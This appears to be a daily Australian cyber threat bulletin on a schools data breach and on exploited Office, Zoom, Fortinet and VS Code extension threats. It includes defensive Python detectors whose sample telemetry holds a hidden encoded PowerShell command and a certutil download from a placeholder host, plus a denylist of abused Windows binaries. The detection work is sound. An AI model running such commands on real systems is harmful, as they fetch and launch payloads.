Executive Summary
The Australian cyber threat landscape over the last 24 hours has been dominated by a significant data breach in the Victorian education sector and the emergency disclosure of critical vulnerabilities in widely deployed enterprise tools. Threat actors are actively exploiting a zero-day in Microsoft Office and a FortiCloud SSO authentication bypass, a critical RCE has been disclosed in Zoom Node Multimedia Routers, and a new supply chain attack targeting developers through malicious AI-branded VS Code extensions has been uncovered. Australian organisations, particularly in Government, Education, and FinTech, must prioritise patching and threat hunting immediately.
Local Impact: Victorian Education Sector Breach
Victorian Department of Education Hit by Major Data Breach
A significant incident has been confirmed involving the Victorian Department of Education, impacting approximately 1,700 government schools. Unauthorised third-party access has compromised the personal information of current and former students.
- Impact: Exposure of PII (Personally Identifiable Information), creating a heightened risk of identity theft and targeted phishing against students and families.
- Action: Educational institutions should be on high alert for follow-on social engineering attacks. Parents and staff should be warned to scrutinise unsolicited communications purportedly from the Department or schools.
Critical Vulnerabilities & Global Threats
1. Microsoft Office Zero-Day (CVE-2026-21509)
- Severity: Critical
- Status: Active Exploitation / Emergency Patch Issued (27 Jan 2026)
- Details: A remote code execution (RCE) vulnerability in Microsoft Office is being actively exploited in the wild. The flaw allows attackers to execute arbitrary code via specially crafted documents, often delivered via phishing emails.
- Recommendation: Apply the emergency patch immediately. Ensure EDR solutions are tuned to detect abnormal Office process behaviour.
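The recommendation above to tune EDR for abnormal Office process behaviour usually translates into a parent/child process rule: Office applications should not be launching shells or script interpreters, and when they do, an encoded or hidden-window PowerShell command line is a strong indicator of a malicious document. The following is an added example of that detection logic, not code from the bulletin or from any vendor. The events are constructed, hypothetical Sysmon Event ID 1 (process creation) records reduced to the fields the rule needs; the encoded payload is a harmless placeholder.

```python
"""Flag Office processes spawning shell or script interpreters.

Added example: the events below are constructed, hypothetical Sysmon
Event ID 1 (process creation) records. Field names follow Sysmon's
(ParentImage, Image, CommandLine, User); all values are made up.
"""
from __future__ import annotations

from dataclasses import dataclass
from pathlib import PureWindowsPath

OFFICE_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "visio.exe",
}
# Children a document has no business launching. Office does spawn legitimate
# helpers (splwow64.exe for printing, the updater), so match a denylist of
# interpreters and LOLBins rather than alerting on any child process.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe", "bitsadmin.exe",
}


@dataclass(frozen=True)
class ProcessCreate:
    utc_time: str
    parent_image: str
    image: str
    command_line: str
    user: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, e.g. 'winword.exe'."""
    return PureWindowsPath(path).name.lower()


def classify(ev: ProcessCreate) -> list[str]:
    """Return the reasons an event is suspicious; an empty list means benign."""
    reasons: list[str] = []
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    if parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
        reasons.append(f"{parent} spawned {child}")
        cmd = ev.command_line.lower()
        # -enc also matches the long form -EncodedCommand.
        if "-enc" in cmd:
            reasons.append("encoded PowerShell command line")
        if "-w hidden" in cmd or "-windowstyle hidden" in cmd:
            reasons.append("hidden window requested")
    return reasons


def find_suspicious(events: list[ProcessCreate]) -> list[tuple[ProcessCreate, list[str]]]:
    """Pair each suspicious event with the reasons it fired."""
    hits = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            hits.append((ev, reasons))
    return hits


# Constructed sample telemetry. 'QQBCAEMA' is UTF-16LE "ABC" in base64, not a payload.
SAMPLE_EVENTS = [
    ProcessCreate("2026-01-27 09:14:02", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                  r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                  "powershell.exe -nop -w hidden -enc QQBCAEMA", r"CORP\jsmith"),
    ProcessCreate("2026-01-27 09:14:05", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                  r"C:\Windows\splwow64.exe", "splwow64.exe 12288", r"CORP\jsmith"),
    ProcessCreate("2026-01-27 09:31:40", r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                  r"C:\Windows\System32\cmd.exe",
                  "cmd.exe /c certutil -urlcache -f http://example.invalid/a.txt a.txt", r"CORP\mlee"),
    ProcessCreate("2026-01-27 09:40:11", r"C:\Windows\explorer.exe",
                  r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                  "powershell.exe -File C:\\scripts\\inventory.ps1", r"CORP\ops"),
]

if __name__ == "__main__":
    for ev, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"{ev.utc_time} {ev.user}: {'; '.join(reasons)}")
```

The explorer.exe-launched PowerShell and the splwow64.exe print helper are deliberately included so the rule's scope is visible: only an Office parent combined with an interpreter child fires, and the command-line checks add severity rather than acting as the trigger.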
2. Zoom Node Multimedia Routers RCE (CVE-2026-22844)
- Severity: Critical
- Details: A command injection flaw in Zoom Node Multimedia Routers (used in Meeting Connector and Hybrid deployments) allows for remote code execution.
- Relevance: High for organisations hosting on-premise or hybrid Zoom infrastructure.
- Recommendation: Update to version 5.2.1716.0 or later immediately.
3. Fortinet SSO Authentication Bypass (CVE-2025-59718/59719 Variant)
- Status: Active Exploitation of Patched Devices
- Details: Threat intelligence indicates active exploitation of a FortiCloud SSO authentication bypass, even on devices believed to be fully patched. Attackers are using crafted SAML messages to create persistent accounts and enable VPN access.
- Recommendation: Review audit logs for suspicious SAML assertions, newly created administrator accounts, and anomalous VPN logins. If suspicious activity is found, consider temporarily disabling FortiCloud SSO until vendor guidance is clarified.
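The attack chain described above (an SSO login, a new account created during that session, then VPN access by the new account) is a sequence, so a useful log review correlates events rather than grepping for one string. Below is an added example of that triage over FortiGate-style key=value event logs; it is not code from the bulletin or from Fortinet. The log lines are constructed, and the field names (logdesc, method, cfgpath, cfgobj, remip) are assumptions about the export layout that should be mapped to your own logs before use.

```python
"""Triage FortiGate-style key=value event logs for the SSO bypass pattern:
SSO/SAML admin login -> admin account created in that session -> VPN login
by the new account.

Added example. Log lines are constructed and field names are assumptions.
"""
from __future__ import annotations

import re
from ipaddress import ip_address, ip_network

# key=value pairs; quoted values may contain spaces and escaped quotes.
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

# Assumption: administrative access is only expected from these ranges.
ADMIN_NETWORKS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]


def parse_kv(line: str) -> dict[str, str]:
    """Parse one log line into a dict, stripping quotes from quoted values."""
    return {k: (v[1:-1] if v.startswith('"') else v) for k, v in KV_RE.findall(line)}


def from_admin_network(ip: str) -> bool:
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in ADMIN_NETWORKS)


def triage(lines: list[str]) -> list[str]:
    """Return human-readable findings, correlating events in arrival order."""
    findings: list[str] = []
    sso_users: set[str] = set()          # admins who authenticated via SSO/SAML
    created_accounts: set[str] = set()   # admin accounts created in this window
    for line in lines:
        ev = parse_kv(line)
        user = ev.get("user", "")
        # Rule 1: SSO/SAML admin login, flagged when from outside admin ranges.
        if ev.get("action") == "login" and ev.get("method", "").lower() in {"sso", "saml"}:
            sso_users.add(user)
            if not from_admin_network(ev.get("srcip", "")):
                findings.append(f"SSO admin login by {user} from non-admin address {ev.get('srcip')}")
        # Rule 2: a new system.admin object added by an SSO-authenticated user.
        if ev.get("cfgpath") == "system.admin" and ev.get("action", "").lower() == "add":
            new_account = ev.get("cfgobj", "")
            created_accounts.add(new_account)
            if user in sso_users:
                findings.append(f"admin account {new_account} created by SSO user {user}")
        # Rule 3: VPN tunnel brought up by an account created in this window.
        if ev.get("subtype") == "vpn" and ev.get("action") == "tunnel-up" and user in created_accounts:
            findings.append(f"VPN tunnel by newly created account {user} from {ev.get('remip')}")
    return findings


# Constructed sample log; 203.0.113.0/24 is documentation address space.
SAMPLE_LOG = [
    'date=2026-01-27 time=08:02:11 type="event" subtype="system" level="notice" '
    'logdesc="Admin login successful" user="admin" method="https" srcip=10.0.5.20 action="login" status="success"',
    'date=2026-01-27 time=09:14:02 type="event" subtype="system" level="notice" '
    'logdesc="Admin login successful" user="sso_user01" method="sso" srcip=203.0.113.45 action="login" status="success"',
    'date=2026-01-27 time=09:15:10 type="event" subtype="system" level="information" '
    'logdesc="Object attribute configured" user="sso_user01" srcip=203.0.113.45 action="Add" '
    'cfgpath="system.admin" cfgobj="support_tmp" msg="Add system.admin support_tmp"',
    'date=2026-01-27 time=09:20:44 type="event" subtype="vpn" level="information" '
    'logdesc="SSL VPN tunnel up" user="support_tmp" remip=203.0.113.45 action="tunnel-up" tunneltype="ssl-web"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print("FINDING:", finding)
```

Rule 1 alone produces noise wherever SSO is the normal admin path; the value is in rules 2 and 3, which fire only on the account-creation and VPN follow-through the bulletin describes. The console-based admin login over HTTPS from the internal range correctly produces nothing.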
Emerging Trends: AI & Supply Chain Attacks
Malicious VS Code AI Extensions
Cybersecurity researchers have identified two malicious Visual Studio Code extensions masquerading as AI coding assistants: "ChatGPT - 中文版" (Chinese version) and "ChatGPT - ChatMoss".
- Threat: These extensions, with over 1.5 million combined installs, contain backdoor functionality that siphons source code and developer environment data to servers located in China.
- Sector Risk: High for SaaS Providers, FinTech, and DevOps teams where proprietary code is the crown jewel.
- Action: Audit developer environments for these extensions immediately and block their IDs (whensunset.chatgpt-china, zhukunpeng.chat-moss).
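Auditing for the two extension IDs above is most reliable when done against the extension directories themselves rather than trusting the IDE, since a tampered extension can also misreport itself. The following added example (not code from the bulletin or from the researchers) scans extension folders, reads each package.json for its publisher.name ID, falls back to the versioned folder name when the manifest is missing or unreadable, and also accepts the output of `code --list-extensions`. The sample extension tree is constructed in a temporary directory so the script runs offline.

```python
"""Audit VS Code extension directories for the blocked extension IDs.

Added example. BLOCKED_IDS are the two IDs named in the bulletin. The sample
tree is constructed; on a real workstation pass ~/.vscode/extensions and, for
remote hosts, ~/.vscode-server/extensions to find_blocked().
"""
from __future__ import annotations

import json
import re
import tempfile
from pathlib import Path

BLOCKED_IDS = {"whensunset.chatgpt-china", "zhukunpeng.chat-moss"}

# Extension folders are named publisher.name-<version>[-<target>], e.g.
# ms-python.python-2024.1.0; strip the version suffix to recover the ID.
FOLDER_RE = re.compile(r"^(.+?)-\d+(?:\.\d+)*(?:-.*)?$")


def extension_id(ext_dir: Path) -> str | None:
    """publisher.name of an installed extension, from package.json if possible."""
    manifest = ext_dir / "package.json"
    if manifest.is_file():
        try:
            meta = json.loads(manifest.read_text(encoding="utf-8"))
            publisher, name = meta.get("publisher"), meta.get("name")
            if publisher and name:
                return f"{publisher}.{name}".lower()
        except (json.JSONDecodeError, OSError, UnicodeDecodeError):
            pass  # fall through to the folder-name heuristic
    m = FOLDER_RE.match(ext_dir.name)
    stem = m.group(1) if m else ext_dir.name
    return stem.lower() if "." in stem else None


def scan_extension_dirs(roots: list[Path]) -> dict[str, Path]:
    """Map every extension ID found under the given roots to its folder."""
    found: dict[str, Path] = {}
    for root in roots:
        if not root.is_dir():
            continue
        for ext_dir in sorted(p for p in root.iterdir() if p.is_dir()):
            ext_id = extension_id(ext_dir)
            if ext_id:
                found[ext_id] = ext_dir
    return found


def find_blocked(roots: list[Path]) -> list[tuple[str, Path]]:
    """Blocked extension IDs present on disk, with their folders."""
    return sorted((i, p) for i, p in scan_extension_dirs(roots).items() if i in BLOCKED_IDS)


def blocked_from_list_output(text: str) -> list[str]:
    """Blocked IDs in the stdout of `code --list-extensions` (one ID per line)."""
    return sorted(line.strip().lower() for line in text.splitlines() if line.strip().lower() in BLOCKED_IDS)


def build_sample_tree() -> Path:
    """Construct a fake extensions directory: one benign, two blocked (one with no manifest)."""
    root = Path(tempfile.mkdtemp(prefix="vscode-ext-audit-"))
    fixtures = {
        "ms-python.python-2024.1.0": {"publisher": "ms-python", "name": "python"},
        "whensunset.chatgpt-china-1.0.3": {"publisher": "whensunset", "name": "chatgpt-china"},
        "zhukunpeng.chat-moss-2.1.0": None,  # manifest missing: exercises the folder fallback
    }
    for folder, meta in fixtures.items():
        d = root / folder
        d.mkdir()
        if meta is not None:
            (d / "package.json").write_text(json.dumps(meta), encoding="utf-8")
    return root


if __name__ == "__main__":
    for ext_id, path in find_blocked([build_sample_tree()]):
        print(f"BLOCKED {ext_id} at {path}")
```

Removing the folder is not the whole remediation: the bulletin states these extensions exfiltrate source and environment data, so any credentials present in affected developers' environments should be rotated and the host's outbound connections reviewed.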
Sector-Specific Intelligence
- Healthcare: The Australian Signals Directorate (ASD) continues to report a surge in ransomware targeting healthcare providers, with incidents doubling compared to the previous period. Threat actors are leveraging the chaos of recent breaches to launch extortion campaigns.
- Government: The NSW Government is rolling out a new framework to make AI risk assessments less subjective. Agencies deploying AI tools must now undergo rigorous testing for bias and security vulnerabilities before deployment.
- IoT and Edge: With the exploitation of edge and on-premises appliances such as FortiGate firewalls and Zoom Node Multimedia Routers, organisations must treat IoT and edge appliances as high-risk entry points. Ensure strict network segmentation is in place to prevent lateral movement from a compromised appliance.
Analyst’s Take
The breach in Victoria serves as a stark reminder that the education sector remains a soft target holding high-value data. At the same time, the technical sophistication seen in the Fortinet bypass and the malicious VS Code extensions indicates that threat actors are moving deeper into the supply chain and infrastructure layer. Defensive teams must look beyond the perimeter and scrutinise the tools their developers and remote workforce rely on daily.
Contact us for a quote for penetration testing service or adversary simulation.